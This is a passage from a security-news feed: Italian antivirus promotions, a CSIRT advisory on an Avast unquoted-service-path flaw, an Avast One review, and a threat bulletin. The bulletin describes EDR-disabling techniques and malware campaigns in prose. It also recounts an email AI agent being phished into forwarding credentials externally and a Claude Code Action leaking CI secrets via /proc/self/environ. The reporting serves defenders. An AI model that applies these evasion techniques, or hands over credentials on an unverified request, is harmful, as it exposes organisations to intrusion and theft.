e risultano inferiori fino al 60% rispetto ai costi di rinnovo. La promozione permette di accedere a una piattaforma che combina protezione dalle minacce informatiche, strumenti per la privacy e applicazioni dedicate alle prestazioni del PC. Ad esempio, una famiglia che utilizza computer Windows, smartphone Android e iPhone può proteggere più dispositivi con un unico abbonamento. Chi lavora spesso fuori sede può invece affiancare l’antivirus alla VPN per navigare con una connessione cifrata anche su reti Wi-Fi pubbliche. Le offerte includono inoltre una garanzia di rimborso entro 30 giorni e prodotti sviluppati nell’Unione Europea.
cybersecurity360.itJul 27, 2026extracted
4 offerte antivirus da non perdere a luglio 2026
L’aumento delle minacce informatiche rende questo uno dei momenti più favorevoli per valutare le migliori offerte antivirus disponibili. Le promozioni per l’acquisto di antivirus riguardano servizi come Incogni, Norton, Avast e Kaspersky e consentono di acquistare protezione per PC, Mac e dispositivi mobili con sconti rilevanti. Ma oggi siamo andati molto oltre il semplice antivirus e molti pacchetti includono VPN, password manager, monitoraggio del Dark Web e strumenti per la tutela della privacy, offrendo una protezione più completa contro phishing, ransomware e furto d’identità. Indice degli argomenti Un antivirus protegge il dispositivo, ma non impedisce che i dati personali continuino a circolare online. Incogni affronta proprio questo problema, automatizzando la rimozione delle informazioni personali dai data broker e da numerosi siti che raccolgono dati degli utenti. Il servizio riduce l’esposizione a phishing, truffe telefoniche e chiamate spam e furti d’identità. Il piano Unlimited amplia la copertura con richieste di rimozione personalizzate da oltre 2.000 siti aggiuntivi e assistenza telefonica dedicata. Tutti i piani includono una garanzia di rimborso entro 30 giorni. L’offerta di Incogni offre diversi piani, che possono adattarsi alle esigenze di ognuno. Norton concentra l’offerta sulla sicurezza dei dispositivi e dell’identità digitale. Oltre all’antivirus sono disponibili Password Manager, backup cloud, VPN, Dark Web Monitoring e il nuovo sistema di Protezione anti-truffa basato su intelligenza artificiale, capace di individuare tentativi di phishing, messaggi fraudolenti e persino contenuti deepfake. Le versioni Deluxe e Premium aggiungono la protezione di più dispositivi, il monitoraggio del Dark Web, il parental control e servizi dedicati al recupero dell’identità in caso di furto di dati. La soluzione Norton Small Business estende inoltre queste tecnologie alle piccole imprese. Di seguito il riepilogo delle principali offerte disponibili con Norton. Le offerte Avast si distinguono per un approccio che combina antivirus, tutela della privacy e ottimizzazione dei dispositivi. I pacchetti Premium Security e Ultimate integrano il motore antivirus con un assistente per il riconoscimento delle truffe online, protezione dal ransomware, difesa contro phishing e siti fraudolenti, oltre al blocco delle chiamate e degli SMS sospetti. I piani più completi includono anche SecureLine VPN, Cleanup Premium e AntiTrack. Questa combinazione permette di proteggere sia la navigazione sia l’identità digitale, migliorando al tempo stesso le prestazioni del computer. La compatibilità con Windows, macOS, Android e iOS rende il servizio adatto a chi utilizza più dispositivi. Kaspersky propone tre livelli di protezione: Standard, Plus e Premium. Tutti includono antivirus, difesa anti-malware, protezione anti-ransomware, firewall, navigazione sicura, anti-phishing e strumenti per ottimizzare il sistema. Le versioni Plus e Premium aggiungono VPN illimitata, Password Manager, controllo delle fughe di dati e strumenti dedicati alla privacy. Il piano Premium estende ulteriormente la protezione con assistenza tecnica remota, verifica dell’integrità del PC, controllo e rimozione dei virus da parte di esperti e un anno di Kaspersky Safe Kids incluso. La promozione prevede anche un buono regalo da 10 euro sui piani Premium. Ecco il riepilogo delle tariffe disponibili nel piano di offerte di Kaspersky. Ogni soluzione risponde a esigenze differenti. Incogni concentra l’attenzione sulla rimozione dei dati personali dal web. Norton offre una suite completa per la protezione dei dispositivi e dell’identità. Avast abbina sicurezza e strumenti dedicati alla privacy. Kaspersky propone un ecosistema completo con funzioni avanzate già incluse nei piani superiori. La scelta dipende dal livello di protezione richiesto e dal numero di dispositivi da mettere al sicuro.
cybersecurity360.itJul 17, 2026extracted
Avast: disponibile PoC pubblico per la CVE-2025-71326
Avast: disponibile PoC pubblico per la CVE-2025-71326 Alert AL04/260622/CSIRT-ITA Sintesi Disponibile Proof of Concept (PoC) per la vulnerabilità identificata tramite la CVE-2025-71326 presente in Avast Antivirus (AV), noto software di sicurezza progettato per proteggere computer e dispositivi da minacce informatiche come malware, virus, ransomware e spyware. Tale vulnerabilità, qualora sfruttata, potrebbe consentire ad un utente malintenzionato locale di elevare i propri privilegi ed eseguire codice arbitrario sui sistemi target. Tipologia Arbitrary Code Execution Privilege Escalation Descrizione e potenziali impatti Disponibile Proof of Concept (PoC) per la CVE-2025-71326 presente in Avast Antivirus (AV), noto software di sicurezza progettato per proteggere computer e dispositivi da minacce informatiche come malware, virus, ransomware e spyware. Tale vulnerabilità, di tipo “Unquoted Service Path” e con score CVSS v3.1 pari a 7.8, è causata da una errata configurazione del percorso di esecuzione di un servizio di sistema, il servizio SecureLine. In particolare, il servizio è configurato con un percorso non quotato, ad esempio: C:\Program Files\AVAST Software\SecureLine\VpnSvc.exe In assenza di virgolette, Windows interpreta il percorso in modo ambiguo e tenta l’esecuzione progressiva dei segmenti, privilegiando eventuali file presenti nei path intermedi. Un attaccante locale, con permessi di scrittura sulle cartelle coinvolte, potrebbe sfruttare questa vulnerabilità inserendo un eseguibile malevolo in uno dei percorsi che il sistema prova per primi. Quando il servizio viene avviato, il payload dell’attaccante può essere eseguito, con privilegi elevati, al posto del binario legittimo. Prodotti e versioni affette Avast AV, versione 25.11 e precedenti Azioni di mitigazione Ove non già provveduto, si raccomanda di aggiornare i prodotti vulnerabili all’ultima versione disponibile.
acn.gov.itJun 22, 2026extracted
Product showcase: Avast One turns scam screenshots into actionable security advice
Product showcase: Avast One turns scam screenshots into actionable security advice Avast One Free combines privacy, security, identity monitoring, and performance tools in a single platform. The app is available for Windows, macOS, Android, and iOS. Checking the device for security and privacy issues After installing it from the App Store, I ran Smart Scan, which reviews device and privacy settings and identifies areas that require attention. The feature provides recommendations that help users improve their security posture and device configuration. The scan found no issues on the tested device and showed that essential protections were enabled. It also highlighted additional features, including email breach monitoring, scam protection, Wi-Fi scanning, and private photo storage. Web Guard helps block malicious and fraudulent websites before they load. Scam Guardian uses AI-assisted detection to identify suspicious messages, links, and other content associated with phishing and fraud attempts. Web Guard analyzed hundreds of links during testing and reported no detected threats. The feature runs in the background and helps prevent access to phishing pages, fraudulent websites, and other unsafe destinations. Putting Avast Assistant to the test Avast Assistant is an AI-powered tool that helps users understand security alerts, evaluate suspicious messages, and find information about privacy and online safety without leaving the app. To test it, I uploaded a screenshot of a recently received scam message. The assistant identified it as a potential fraud attempt, explained the indicators that raised concern, and provided guidance on how to verify the claim and avoid further interaction with the sender. The app also includes Device Security, which checks for issues such as outdated operating system versions and missing device protections. During testing, it verified that the device was running the latest iOS version and that a passcode was enabled. Network Inspector evaluates Wi-Fi networks and helps identify unsafe connections. It scanned the connected network, verified that it was password protected, and showed that encryption was enabled. The feature also recommends when VPN protection should be used. Hack Alerts allows users to monitor email addresses for exposure in known data breaches. After adding an email address, the feature identified previously compromised accounts and displayed information about the affected services, helping users determine where passwords should be changed or additional security measures applied. Final thoughts Avast One Free was straightforward to install and use, with features that are easy to find and understand. While the app includes protection against common mobile threats, Avast Assistant stood out during testing by helping explain suspicious content and providing guidance on what to do next. Users looking for a mobile security app that combines protection, monitoring, and assistance in a single interface may find it worth considering.
helpnetsecurity.comJun 12, 2026extracted
ThreatsDay Bulletin: Worm Code Leaked, AI Agent Phished, Claude Code Patch + 28 New Stories
It's been one of those weeks. You expect the usual noise: recycled malware, sloppy attacks, another easy target getting hit. Instead, there's a supply chain attack kit in a public repo, a $5,000-a-month RAT that clones browsers, and research showing AI agents can be tricked into leaking real credentials. The bigger problem is how polished this all looks now. Mule networks run like SaaS. Deepfake KYC bypass is sold as a feature. Endpoint tools can be quietly weakened using built-in OS settings, with no exploit needed. Here's the full list of threats, tools, flaws, and updates worth knowing. 3.3B identity records exposedA new analysis from Flashpoint has revealed that "more than 11.1 million devices were infected with infostealers last year, fueling a supply of over 3.3 billion stolen credentials, session cookies, cloud tokens, and other forms of identity data now circulating across illicit markets." There are over 30 unique infostealer strains actively listed for sale across illicit marketplaces, forums, and underground communities, indicating the "scale and accessibility of the modern malware-as-a-service ecosystem." Lumma, Acreed, Rhadamanthys, Vidar, and StealC were the most prolific stealers in 2025. India, Brazil, Indonesia, Vietnam, the Philippines, and the U.S. were the top six countries affected by stealer malware during the same period. MaaS RAT targets credentialsA threat actor named "o1oo1" has advertised an advanced remote access trojan (RAT) named SilabRAT that's sold under a malware-as-a-service (MaaS) model for $5,000 a month on darknet forums since September 2025. "SilabRAT is heavily focused on financial gain through credential theft," Group-IB said. "It offers stability and is capable of bypassing existing security measures." Delivered via ClickFix campaigns using Hijack Loader, the malware uses Hidden Virtual Network Computing (HVNC) to facilitate remote control capabilities, employs techniques like Browser Profile Cloning to replicate a user's browser profile (user agent, extensions, storage, and other fingerprinting attributes) to the attacker's system, and can identify wallet addresses or extract cryptocurrency-related artifacts. The Russian-speaking malware developer and vendor, "o1oo1," has been active since late 2020, previously launching a service called AsmCrypt. 47% of tech intrusionsCrowdStrike has revealed that a North Korean threat actor known as Famous Chollima, which is behind the long-running IT worker and Contagious Interview campaign, accounted for 47% of all state-sponsored hands-on-keyboard operations against the tech sector between April 2025 and March 2026. Hands-on intrusions refer to cyber attacks in which a human operator controls and interacts with a system rather than relying solely on malware. "In their IT worker infiltration campaigns, they sought fraudulent employment at tech companies across North America, Europe, and Asia," the cybersecurity company said. 13 domains seizedThe U.S. Department of Justice has announced the seizure of 13 internet domains masquerading as consulting companies used to target U.S. persons, including current and former security clearance holders with access to classified and sensitive U.S. government information. "These domain seizures offer a glimpse at how foreign actors can use promises of easy money to lure Americans into revealing sensitive or classified information that they are duty-bound to protect," said Assistant Attorney General for National Security John A. Eisenberg. "Anyone approached online with offers of easy income for vague 'consulting' work should treat those overtures with extreme caution and remain vigilant for warning signs of malicious targeting." These sham companies advertised generic consulting or analyst jobs on platforms like Upwork, Expertia AI, Hubstaff Talent, Wellfound, and Post Job Free that sought to recruit current or former U.S. government and U.S. military employees to lend their expertise to unspecified clients. The recruiters then pressured candidates to part with confidential information and reports from "insider" sources in exchange for cryptocurrency payments. The operation is assessed to have commenced in November 2023. The operation is assessed to have commenced in November 2023.. The announcement comes after the Five Eyes intelligence alliance countries warned of China aggressively using job platforms to target people for information. In a statement shared with Reuters, the Chinese Embassy in Washington condemned the allegations and called them fabricated. Supply-chain toolkit exposedThe Miasma credential-stealing attack framework was briefly made available for free on GitHub, after multiple repositories with the name "Miasma-Open-Source-Release" began appearing since June 8, 2026. According to SafeDep, the source code has been published through compromised developer accounts. "The Miasma codebase appears to be larger than a supply chain worm," SafeDep said. "It is a full supply chain attack toolkit that allows the operator to execute various attacks via stolen credentials against arbitrary or targeted packages on public registries (PyPI, npm, RubyGems), JFrog Artifactory, GitHub repositories and GitHub Actions, AI coding tools config poisoning, SSH-based lateral movement, and other attack vectors." As opposed to relying on conventional command-and-control (C2) infrastructure, the malware employs three independent C2 channels using GitHub commit search, each with a different search string and crypto key: "DontRevokeOrItGoesBoom" to discover attacker-controlled personal access tokens (PATs) for data exfiltration, "TheBeautifulSandsOfTime" to deliver JavaScript, and "firedalazer" to deliver Python script URLs that act as a remote code execution backdoor. Miasma is assessed to be a variant of the Shai-Hulud worm. The campaign has since morphed into a Python variant called Hades, which represents the latest evolution of the sustained software supply chain campaign. As of last week, a total of 304 components have been impacted by Miasma. Search uploads retainedGoogle has revealed that it intends to save the images, files, audio, and video users upload to Search under a new "Search Services History" setting. This can include images, files, and audio/video recordings, such as Google Lens images, content you upload, and recordings from Search Live, Translate speaking practice, and voice searches, per Google. The tech giant said the Search Services History setting will be used to "provide, develop, and improve its services," including its AI models, as well as offer personalized suggestions and ads if the new "Personalized Recommendations" option is switched on. These two settings are separate from Google's Web & App Activity. Cross-platform RAT emergesIru has analyzed a new cross-platform RAT called SStar Agent that's designed for both Windows and macOS systems. "The macOS builds are heavily instrumented surveillance tools focused on recon and exfiltration, while the Windows build layers on a keyboard hook, clipboard monitor, and remote mouse/keyboard control," the company said. "Notably, the malware includes a large POST request via endpoint /api/telemetry/report that constantly monitors and exfiltrates the entire directory tree to monitor files of interest. The gap between the Windows and macOS versions indicates this is still a work in progress." The malware is delivered by means of a poisoned npm package named "tw-style-utils." The lure is a bogus Web3 engineering take-home assessment, a GitHub repository ("star45674/smart-contract-engineer-role") that's likely distributed to targets. While the repository itself is clean, the payload resides in the npm dependency. Although it's not clear who is behind the malware, the activity overlaps with previously observed social engineering attacks mounted by North Korean hacking groups. Fake npm popularityTenable has detailed a technique dubbed download pumping, where attackers artificially inflate npm package download counts in order to make malicious packages appear legitimate and trustworthy to developers. This approach has been observed in a package named "ambar-src," which reached more than 50,000 downloads in three days after attackers published hundreds of benign versions of the package before introducing the actual malicious payload. "Every time a new version was published, automated systems like repository mirrors and analysis bots automatically downloaded it," Tenable said. "Because the attackers systematically uploaded hundreds of versions, they artificially generated a massive wave of automated traffic, inflating the package's download count to more than 50,000 downloads in just three days." Exchange spoofing riskA weakness in certain configurations of Microsoft Exchange could be abused by attackers to send emails masquerading as any user to a vulnerable organization. The technique has been codenamed Ghost-Sender. "Using Exchange Online (or on-premises Exchange in hybrid mode) in combination with an external MX record, such as a third-party email server or spam protection solution, can allow the spoofing of emails from any sender to any recipient in the target tenant," InfoGuard Labs said. "This is regardless of the configured SPF, DKIM, and DMARC policies of the spoofed sender's domain, and the emails are delivered without any further warning. It is possible to send emails from anyone, including external and internal email addresses. For internal senders, Outlook even resolves the sender's profile picture." Russia-focused phishing wavesA previously unknown group known as SiribClone has targeted Russian military personnel using bait applications for "safe photo exchange" to distribute malicious files for desktop and mobile devices. In some cases, members of the group have posed as women seeking romantic relationships to infect smartphones, computers, and Telegram accounts. The group has been active since early 2025. Attacks targeting Android devices lead to the deployment of a spyware called SafeLoveStealer that can steal photographs, videos, documents, and location data. Windows systems, on the other hand, are infected by a stealer known as SiribGrabber. The malware is distributed via phishing emails containing ZIP archives disguised as military-themed documents. In addition, the group operates phishing sites mimicking Telegram login pages to trick targets into entering their phone numbers, verification codes, and two-factor authentication passwords, allowing them to seize control of the accounts. Also linked to the threat actor is a tool called Kontur that stores stolen Telegram sessions and allows operators to review captured messages. Russian maritime universities, energy facilities, diplomatic missions, and government agencies have also been targeted through phishing campaigns by an unidentified group since at least July 2024. Recent attack waves have employed a C2 framework called Ravage, although two distinct phishing campaigns observed in 2024 have used Cobalt Strike. The third hacking group to single out Russia (along with Belarus) is Cloud Atlas, which has resorted to sending phishing emails with ZIP archives containing malicious shortcuts that launch PowerShell scripts, paving the way for malware like VBShower and PowerShower, the latter of which is used to drop a credential grabber. Lateral movement via RDP, SSH, and RevSocks is achieved via PAExec or PsExec as part of a framework known as PowerAdmin. Furthermore, the attacks involve two new tools: PowerCloud, which collects user data with administrator privileges and writes it to Google Sheets, and Browser checker, a PowerShell script that checks whether browser processes (Chrome, Edge, Firefox, and others) are running. ClickFix backdoor expandsA ransomware-related threat actor has put to use a new malware family called MLTBackdoor that's delivered via ClickFix. "MTLBackdoor supports a set of commands like downloading and uploading files from the victim's system," Zscaler ThreatLabz said. "However, one of the most powerful features is the ability to load Beacon Object Files (BOFs) to expand its capabilities." The malware was discovered in May 2026. In recent months, ransomware and data extortion attacks involving DragonForce and World Leaks have employed backdoors like VIPERTUNNEL, a Python malware previously linked to RansomHub, and RustyRocket, a custom-built Rust tool to facilitate covert data exfiltration and persistent access. "Once an attacker runs it, RustyRocket can securely connect back to an attacker-controlled server using heavily encrypted and layered traffic that blends in with normal internet activity, making it very hard for defenders to detect," Accenture's T. Ryan Whelan said. "This malware is an integrated communications architecture built for persistence and obfuscation." WooCommerce card theftA new skimmer campaign is targeting WooCommerce sites to steal card details from checkout pages. "The skimmer impersonates the real Stripe payment element, validates cards in real time so the victim never suspects anything," CloudSEK said. "The most 'professional' aspect of this sample is how hard it works to feel legitimate. It re-implements the same client-side checks a real checkout performs." 33,000 users targetedA new Go-based loader named GoFlateLoader is being used to deliver multiple infostealers, including Amatera, Remus, Lumma, Vidar, StealC, and SvitStealer. "GoFlateLoader appears both in x86 (32-bit) and x86-64 (64-bit) variants, matching the bitness of the payload it is supposed to execute," Gen Digital's Avast said. "The loader is designed for in-memory payload execution and is deliberately inflated with a massive PE overlay to hinder detection." The malware is delivered via cracked software and a malicious Traffic Distribution System (TDS) that has been used to deliver Remus Stealer, AnimateClipper, and the SessionGate framework. Since the beginning of April 2026, more than 33,000 unique users have been targeted, with the most affected countries including Brazil, India, Argentina, Mexico, Turkey, and Spain. $862K damage caseMaxwell Schultz, 36, of Columbus, Ohio, has been sentenced to 24 months in federal prison for hacking into his employer's network after his contract was terminated in May 2021. Impersonating another contractor, Schultz obtained login credentials, accessed the former employer's systems, and executed a malicious PowerShell script that reset roughly 2,500 passwords, locking out employees and contractors and causing more than $862,000 in losses. Schultz pleaded guilty to the crime in November 2025. Fake banking updatesA new phishing campaign impersonating Italian and European banking brands is being used to distribute an Android malware called NFCShare. The attacks use phishing sites that aim to trick users into entering their credentials, after which they are prompted to update the banking application by downloading an APK file hosted on GitHub ("antoniocastaldo1998/app-scuola"). The end goal is to guide the user through a fake card verification flow: bring the card near the phone, keep it close while "authenticating," and enter the card PIN. Under the hood, the app reads NFC card data (ISO-DEP) and exfiltrates it to a remote WebSocket endpoint. The activity shares tactical overlaps with other NFC relay malware, such as SuperCardX and RelayNFC. The presence of Chinese text suggests a China-linked operator or tooling lineage. AI agent phishing riskFour phishing simulations on an OpenClaw email agent codenamed Pinchy have revealed it to be susceptible to tactics commonly used to deceive human users. "In some cases, Pinchy not only failed at spotting the phishing attacks, it also performed risky actions that could potentially compromise a real-world organization," Varonis said. "In one notable case, a casual email from 'Dan' asking the agent to share staging credentials was enough to forward AWS IAM keys, database passwords, and SSH access to an external Gmail." This agent phishing is different from indirect prompt injection. While the latter embeds malicious instructions inside data the model consumes to trigger unintended actions or responses, agent phishing operates above the application surface. "A believable request arrives through a normal communication channel, reads like a legitimate business message, and succeeds when the agent acts on it before verifying who asked," Varonis added. AI fixes weak passwordsApple has revealed that its upcoming version of Apple Intelligence, the company's generative artificial intelligence (AI) system, will support capabilities to update its weak and compromised passwords with a single tap via the Passwords app. "Building on its ability to alert users about weak and compromised passwords, Passwords can now automatically fix these for users with just a tap," Apple said. "Using Apple Intelligence and Safari to agentically take action on a user's behalf, Passwords securely navigates through websites to sign in and upgrade their accounts to strong passwords." EDR telemetry throttledA new technique called EDRChoker that interferes with the client-server connection of Endpoint Detection and Response (EDR) software to sidestep defenses. "EDRChoker uses policy-based Quality of Service (QoS) to throttle EDR agents to the lowest bandwidth; when agents attempt to connect, they will consistently time out due to the extremely low bandwidth," a security researcher who goes by the name Zero Salarium said. "It takes a list of common EDR process names and creates QoS policies that limit those processes to 8 bits per second. At that bandwidth, an EDR agent becomes effectively isolated from its server." Earlier this January, the researcher also demonstrated EDRStartupHinder, which prevents an EDR program from starting. "EDRStartupHinder aims to exploit Windows Bindlink to redirect a DLL from System32 to another location, alongside taking advantage of the function that only loads DLLs signed by a program protected with Protected Process Light (PPL) to prevent AV/EDR services from starting," the researcher said. Another technique devised by Binary Defense involves disabling critical security services, such as Windows Defender and Sysmon, without triggering traditional malware alerts. It modifies Windows Access Control Lists (ACLs) to add "Deny" Access Control Entries (ACEs) against core system libraries like "kernel32.dll." Because these services rely on the DLL to function, the dependency chain is broken. Upon a system reboot, the protected services fail to start, leaving the endpoint without any defenses. STX RAT supply chain growsThe supply chain attack targeting CPUID to deliver STX RAT is broader in scope than previously thought, with a new analysis from Cyderes uncovering seven additional trojanized packages tied to the same campaign. "All packages follow the same delivery mechanism," the cybersecurity company said. "The actor, operating under the alias Leda Elacoate (pufferfish11@firemail[.]cc), built and maintained a Bitbucket repository of trojanized installers over approximately one month, targeting a wide range of user demographics." Among the impacted packages is X-VPN, a consumer VPN with over 100 million reported users. Users who installed X-VPN from official channels are not affected. "The actor began with cryptocurrency exchange and trading software as lures, targeting users with likely access to financial accounts, and progressively expanded that lure portfolio across a social engineering decoy and VPN software," Cyderes added. Agent Tesla via ZIP luresPhishing emails masquerading as legitimate payment advice messages are being used to deliver ZIP archives, opening which triggers a multi-stage infection chain that leads to the deployment of Agent Tesla. "In simple terms, the victim opens what looks like a harmless file, but behind the scenes, a heavily obfuscated Batch script silently launches PowerShell, which then pulls and executes additional malicious code directly in memory," Point Wild said. "From there, the attack escalates into a staged execution chain involving shellcode decoding, persistence setup, and process injection into legitimate Windows applications like charmap.exe." Agent, Tesla is designed to steal browser credentials, log keystrokes, capture screenshots, and extract sensitive data from the system. The collected information is then exfiltrated using SMTP-based communication, allowing malicious traffic to blend with normal-looking email activity. AI video lures spread malwareTwo social engineering campaigns are using AI-generated TikTok videos and Instagram Reels to direct users to sketchy sites that deploy Vidar Stealer and other dubious programs, in some cases requiring visitors to complete surveys before they could access the promised downloads. "One methodology involves fake tutorials for software installs, with professional-sounding voice-overs and clean graphics," ReversingLabs said. "The second approach relies on posts demonstrating how to use premium software for free, spanning multiple videos, with a centralized tutorial being introduced after the account gains traction." Routers turned into C2 nodesA suspected China-nexus intrusion set has been identified conducting a large-scale campaign targeting edge network devices across Southeast Asia. "The adversary deploys a custom Linux ELF implant (router.elf) directly onto compromised border routers, establishing persistent command-and-control (C2) via DNS over HTTPS (DoH) while simultaneously weaponizing the router's iptables subsystem to hijack downstream DNS traffic at scale," a security researcher named Y4er said. "Correlated Windows-side tradecraft leverages a cracked Cobalt Strike 4.4 Beacon delivered via DLL sideloading (version.dll), sharing identical C2 infrastructure and malleable C2 profiles with the router implant - confirming unified operational control. RMM abused in BrazilAn active phishing campaign has been observed targeting Brazilian organizations with fake business-document lures, resulting in the download of a NinjaOne Remote Monitoring and Management (RMM) agent. "The campaign begins with phishing emails that redirect victims to Portuguese-language landing pages impersonating familiar Brazilian workflows, including SEFAZ-related fiscal documents, Reclame Aqui-style complaint processes, and secure document-delivery portals," Cato Networks said. "After completing a fake verification process, victims are prompted to download what appears to be a protected business document. Instead, the download delivers a legitimate NinjaOne RMM agent configured to provide remote access to attacker-controlled infrastructure, highlighting a previously undocumented abuse of NinjaOne in the Brazilian threat Landscape." The development once again highlights how threat actors no longer need to rely on bespoke malware to infiltrate organizations. Money laundering goes MaaSCybersecurity company KELA has shed light on money mule networks, which play a crucial role in modern cybercrime and financial fraud ecosystems, enabling threat actors to launder and monetize proceeds through ransomware, scams, and Business Email Compromise (BEC), and other illicit schemes. "In recent years, traditional mule recruitment has increasingly evolved into professionalized Mule-as-a-Service (MaaS) ecosystems that provide scalable laundering infrastructure to cybercriminals," KELA said, adding "mule operations increasingly rely on stolen identities, synthetic identities, compromised accounts, and AI-assisted onboarding techniques rather than solely recruiting human participants." Threat actors have also been found to rely on forged documentation, deepfake-enabled KYC bypass methods, account takeover techniques, and automated account "warming" activity to set up resilient laundering infrastructures across multiple financial platforms. AI chats exposedG DATA said it has witnessed a growing number of Google Chrome extensions that impersonate legitimate productivity tools while stealthily hijacking users' conversations with AI chatbots. Some of these include Urban VPN, Smart Sidebar: ChatGPT, Claude & DeepSeek, and Chat AI, the last of which exhibits traits consistent with a campaign dubbed AiFrame. "User data generated through AI conversations may still be vulnerable to theft by threat actors utilizing plug-ins that pose as legitimate tools," G DATA said. 507 Meta repos exposedA public Meta IP address running an open Grafana instance acted as a pathway for read-write access to 507 private Meta repositories, netting the Sectricity Security Team a bug bounty of $157,000. "The pivot was a wildcard SAN on the TLS certificate: *.llm-playground.aws.metafb.cloud, which exposed a quiet shadow estate behind metafb.cloud," the cybersecurity company said. "By parsing JavaScript bundles across that estate, we uncovered references to a previously unseen domain: api.haloworld.xyz, which became the next pivot point. Slight (AI built wordlist given JS bundles, context, etc) fuzzing against api.haloworld.xyz then exposed /_api/gcp-token, an unauthenticated endpoint that handed out a valid GCP OAuth2 token." The GCP token, in turn, granted read access to the project's Secret Manager that contained a Vercel token. The Vercel token exposed 85 environment variables across Meta's projects, including multiple GitHub personal access tokens (PATs) and other secrets. One of those GitHub tokens had read/write access to 507 private repositories. 7M seniors’ data soldTroy Murray, 57, of Hickory, North Carolina, has been sentenced to more than 10 years in prison for selling the personal information of over 7 million elderly Americans to Jamaican lottery fraud scammers. He has also been ordered to pay a forfeiture in the amount of $5,214,688.48. Murray "devised a scheme where he organized, maintained, and sold lists containing the names, phone numbers, physical addresses, and, in some cases, ages and email addresses, of elderly Americans to individuals in Jamaica involved in lottery fraud schemes," the U.S. Justice Department said. "From 2016 to 2023, Murray sold these lists to Jamaican scammers, who perpetrated lottery fraud on elderly American consumers, earning Murray hundreds of thousands of dollars each year." Each of these lists was sold for $500. One-packet crash bugSecurity researcher Marcus Hutchins has released details and a proof-of-concept (PoC) exploit for ComoDoS, an integer underflow vulnerability residing in Comodo Internet Security's firewall driver, Inspect.sys (CVE-2026-49494, CVSS score: 7.5). "Although the vulnerability can be used to remotely trigger both an out-of-bounds (OOB) read and out-of-bounds write in the Windows kernel, the limitations on both primitives lead me to believe it's unlikely this bug could be weaponized into RCE," Hutchins said. "The bug does, however, enable you to remotely crash the target system with a single TCP/IP packet, even if the firewall is configured to block all ports." The vulnerability remains unpatched as of writing. CI/CD secrets exposedMicrosoft said it discovered an issue in the Claude Code GitHub Action that could be exploited to expose CI/CD workflow secrets when AI agents process untrusted GitHub content, including issue bodies, pull request descriptions, and comments. "While Claude Code Action supported environment scrubbing for subprocess execution paths such as Bash, the Read tool was not subject to the same sandboxing model," the Windows maker said. "It was eventually authorized to access /proc/self/environ, reading the workflow's ANTHROPIC_API_KEY and potentially other credentials available to the runner." Following responsible disclosure on April 29, 2026, the issue was fixed on May 5 with the release of Claude Code version 2.1.128. The patch strengthens the Read tool by unconditionally rejecting a number of files in /proc/ in order to protect those files from exfiltration. Fake $200K job lureThe Iranian hacking group known as Nimbus Manticore approached an employee via LinkedIn by impersonating a headhunter, luring them with a salary offer of $200,000 per year. Per Nextron Systems, the interaction is said to have redirected the victim to a fake hiring portal branded as Ebix Recruitment that prompted them to enter temporary credentials received from the recruiter to log in to the website. "After authentication, the portal prompted the victim to download a two-factor authentication application for 'additional security,'" the company said. "The advertised 2FA application was delivered as a ZIP archive and contained the malware payload." The attack culminates with the deployment of a custom implant with data exfiltration and remote control capabilities. Backdoor with wiper modulesCybersecurity researchers have flagged a new Golang backdoor called BLUERABBIT that routes C2 through RabbitMQ for tasking, Redis for state management, and MinIO for S3-compatible data exfiltration. "It is a full-spectrum intrusion tool: remote access, system profiling, file encryption with a .candy extension, and two distinct disk-wiping modules capable of rendering systems permanently unrecoverable," Binary Defense said. The backdoor is assessed to be the work of an Iran-nexus threat actor. It was first observed in mid-to-late March 2026, and is likely used for targeting entities in Israel. BLUERABBIT is "related to the same likely Iran-nexus activity cluster that previously leveraged BLUEWIPE and SEWERGOO in June 2025," it added. The throughline is simple: attackers do not always need exploits. They need patience, stolen credentials, trusted tools, and one policy setting nobody has checked since the last reorg. The perimeter is not the real problem anymore. The problem is everything inside it that still trusts by default. Same old lesson: audit what your agents can access, treat every identity in the pipeline as a risk, and check what your browser extensions are sending home. See you Thursday.
thehackernews.comJun 11, 2026extracted
Sconto Avast fino al 60%: antivirus, VPN e strumenti privacy in forte promozione
La nuova iniziativa di Avast punta a rendere più accessibili le principali soluzioni di sicurezza informatica. La promozione dell’antivirus Avast, disponibile per PC Windows, Mac, Android e iPhone/iPad, prevede uno sconto su diversi prodotti dedicati alla protezione da malware, phishing, ransomware e truffe online: il ribasso è fino al 60%. L’offerta di Avast interessa anche le famiglie che desiderano proteggere più dispositivi con un unico abbonamento. Indice degli argomenti Le soluzioni di Avast più complete incluse nella promozione sono Avast Premium Security e Avast Ultimate, entrambe disponibili con riduzioni di prezzo fino al 60%. Premium Security integra diversi strumenti di difesa contro le minacce digitali più diffuse. Tra le funzionalità disponibili ci sono: protezione da virus e malware; difesa contro ransomware; blocco dei siti di phishing; rilevamento di siti web falsi; verifica della sicurezza delle reti Wi-Fi; protezione dagli attacchi di accesso remoto; identificazione di truffe online e contenuti deepfake. La versione Ultimate aggiunge ulteriori strumenti dedicati alla privacy e alle prestazioni del dispositivo: SecureLine VPN; Cleanup Premium; AntiTrack; tutte le funzioni di Premium Security. Tra le offerte più interessanti rientra anche SecureLine VPN, il servizio che cripta il traffico internet e migliora la privacy durante la navigazione su reti pubbliche e private. L’offerta permette di ridurre significativamente il costo rispetto al prezzo standard di rinnovo pari a 93,99 euro annui. La promozione di Avast coinvolge anche altre soluzioni dedicate alla privacy e all’ottimizzazione dei dispositivi. AntiTrack riduce il tracciamento online da parte di inserzionisti e soggetti terzi, mentre BreachGuard aiuta a monitorare l’esposizione dei dati personali nelle violazioni informatiche. Questi strumenti consentono di eliminare file inutili, recuperare spazio di archiviazione e mantenere aggiornati i driver del sistema, contribuendo a migliorare prestazioni e stabilità del dispositivo. L’offerta di sconto Avast si distingue per la presenza di sconti elevati su un catalogo particolarmente ampio. Oltre all’antivirus tradizionale, gli utenti possono accedere a servizi VPN, strumenti anti-tracciamento e soluzioni per l’ottimizzazione del sistema. La disponibilità su Windows, Mac, Android e iOS, insieme alla garanzia di rimborso entro 30 giorni, rende la promozione una delle più complete attualmente proposte dal marchio europeo.
cybersecurity360.itJun 9, 2026extracted
Argamal: Malware hidden in hentai games
